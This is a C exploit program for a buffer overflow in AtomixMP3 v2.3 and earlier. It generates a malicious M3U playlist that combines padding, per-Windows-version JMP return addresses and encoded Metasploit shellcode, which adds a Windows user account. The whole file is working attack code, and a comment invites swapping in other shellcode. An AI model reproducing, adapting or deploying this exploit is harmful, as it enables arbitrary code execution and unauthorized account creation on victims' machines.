#include #include #include int main(int argc, char *argv[]) { FILE *Exploit; char buffer[525]; /* win32_adduser - PASS=prueba EXITFUNC=seh USER=prueba Size=488 Encoder=Alpha2 http://metasploit.com */ unsigned char scode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68" "\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x78\x41\x32\x41\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x59\x6c\x6d" "\x38\x67\x34\x75\x50\x55\x50\x75\x50\x6c\x4b\x67\x35\x67\x4c\x6e" "\x6b\x73\x4c\x67\x75\x53\x48\x45\x51\x5a\x4f\x4e\x6b\x70\x4f\x35" "\x48\x4e\x6b\x53\x6f\x47\x50\x56\x61\x5a\x4b\x57\x39\x4c\x4b\x46" "\x54\x4c\x4b\x45\x51\x48\x6e\x37\x41\x6f\x30\x4f\x69\x4c\x6c\x4f" "\x74\x4f\x30\x32\x54\x37\x77\x49\x51\x59\x5a\x36\x6d\x65\x51\x4b" "\x72\x78\x6b\x69\x64\x37\x4b\x61\x44\x46\x44\x45\x54\x51\x65\x4b" "\x55\x4c\x4b\x71\x4f\x74\x64\x77\x71\x78\x6b\x35\x36\x6e\x6b\x46" "\x6c\x70\x4b\x4c\x4b\x51\x4f\x67\x6c\x47\x71\x48\x6b\x4c\x4b\x77" "\x6c\x6e\x6b\x63\x31\x38\x6b\x4d\x59\x61\x4c\x71\x34\x53\x34\x38" "\x43\x50\x31\x4f\x30\x63\x54\x6e\x6b\x57\x30\x54\x70\x4e\x65\x4b" "\x70\x70\x78\x44\x4c\x4e\x6b\x57\x30\x54\x4c\x4c\x4b\x44\x30\x47" "\x6c\x4c\x6d\x6c\x4b\x53\x58\x65\x58\x4a\x4b\x37\x79\x6e\x6b\x4f" "\x70\x6c\x70\x65\x50\x67\x70\x53\x30\x6c\x4b\x73\x58\x67\x4c\x71" "\x4f\x55\x61\x6c\x36\x31\x70\x71\x46\x4f\x79\x4b\x48\x6b\x33\x69" "\x50\x41\x6b\x76\x30\x53\x58\x4c\x30\x4d\x5a\x45\x54\x73\x6f\x61" "\x78\x5a\x38\x6b\x4e\x4d\x5a\x76\x6e\x76\x37\x6b\x4f\x6b\x57\x50" "\x63\x50\x6d\x45\x34\x44\x6e\x31\x75\x34\x38\x73\x55\x55\x70\x36" "\x4f\x33\x53\x45\x70\x52\x4e\x51\x75\x70\x74\x41\x30\x41\x65\x42" "\x53\x75\x35\x32\x52\x61\x30\x42\x50\x72\x52\x62\x55\x30\x65\x42" "\x42\x55\x31\x55\x70\x64\x30\x31\x62\x52\x55\x33\x55\x70\x62\x33" "\x51\x45\x70\x34\x6f\x61\x51\x63\x74\x37\x34\x47\x50\x35\x76\x37" "\x56\x37\x50\x70\x6e\x35\x35\x52\x54\x57\x50\x52\x4c\x52\x4f\x43" "\x53\x32\x41\x70\x6c\x51\x77\x50\x72\x30\x6f\x70\x75\x64\x30\x37" "\x50\x32\x61\x50\x64\x70\x6d\x41\x79\x72\x4e\x30\x69\x32\x53\x72" "\x54\x43\x42\x61\x71\x50\x74\x50\x6f\x62\x52\x71\x63\x65\x70\x34" "\x30\x41\x62\x33\x45\x51\x75\x63\x52\x51\x71\x71\x30\x34\x6f\x70" "\x41\x70\x44\x31\x54\x65\x50\x68"; /* replace it with your own shellcode :) */ int JMP, x; printf("\n======================================================================\n"); printf("AtomixMP3 <= v2.3 M3U Buffer Overflow Exploit\n"); printf("Discovered and Coded By: Greg Linares \n"); printf("Usage: %s \n", argv[0]); printf("\n JMP Options\n"); printf("1 = English Windows XP SP 2 User32.dll \n"); printf("2 = English Windows XP SP 1 User32.dll \n"); printf("3 = English Windows 2003 SP0 and SP1 User32.dll \n"); printf("4 = English Windows 2000 SP 4 User32.dll \n"); printf("5 = French Windows XP Pro SP2 \n"); printf("6 = German/Italian/Dutch/Polish Windows XP SP2 \n"); printf("7 = Spainish Windows XP Pro SP2 \n"); printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 \n"); printf("9 = French/Italian/Chineese Windows 2000 Server SP4 \n"); printf("====================================================================\n\n\n"); /* thanks metasploit and jerome for opcodes */ if (argc < 2) { printf("Invalid Number Of Arguments\n"); return 1; } Exploit = fopen(argv[1],"w"); if ( !Exploit ) { printf("\nCouldn't Open File!"); return 1; } memset(buffer, 0, 520); fputs("#EXTM3U\r\n#EXTINF:0,", Exploit); fputs("0-day_AtomixMP3_M3U_Buffer_Overflow_Exploit_By_Greg_Linares\r\n", Exploit); fputs("C:\\", Exploit); for (x=0;x<(520 - 4);x++) { strcat(buffer, "A"); } fputs(buffer, Exploit); if (atoi(argv[2]) <= 0) { JMP = 1; } else if (atoi(argv[2]) > 9) { JMP = 1; } else { JMP = atoi(argv[2]); } switch(JMP) { case 1: printf("Using English Windows XP SP2 JMP...\n"); fputs("\xbc\x41\xdb\x77", Exploit); break; case 2: printf("Using English Windows XP SP1 JMP...\n"); fputs("\xfc\x18\xd7\x77", Exploit); break; case 3: printf("Using English Windows 2003 SP0 & SP1 JMP...\n"); fputs("\xdc\x4a\xd7\x77", Exploit); break; case 4: printf("Using English Windows 2000 SP 4 JMP...\n"); fputs("\x56\xc2\xe3\x77", Exploit); break; case 5: printf("Using French Windows XP SP 2 JMP...\n"); fputs("\x9f\x51\xd8\x77", Exploit); break; case 6: printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n"); fputs("\xa0\x73\xd8\x77", Exploit); break; case 7: printf("Using Spainish Windows XP SP 2 JMP...\n"); fputs("\x2f\x93\xd9\x77", Exploit); break; case 8: printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n"); fputs("\x29\x4c\xe0\x77", Exploit); break; case 9: printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\n"); fputs("\x29\x4c\xdf\x77", Exploit); break; } fputs((const char*)scode, Exploit); fputs("\r\n", Exploit); printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]); printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n"); printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n"); fclose(Exploit); return 0; }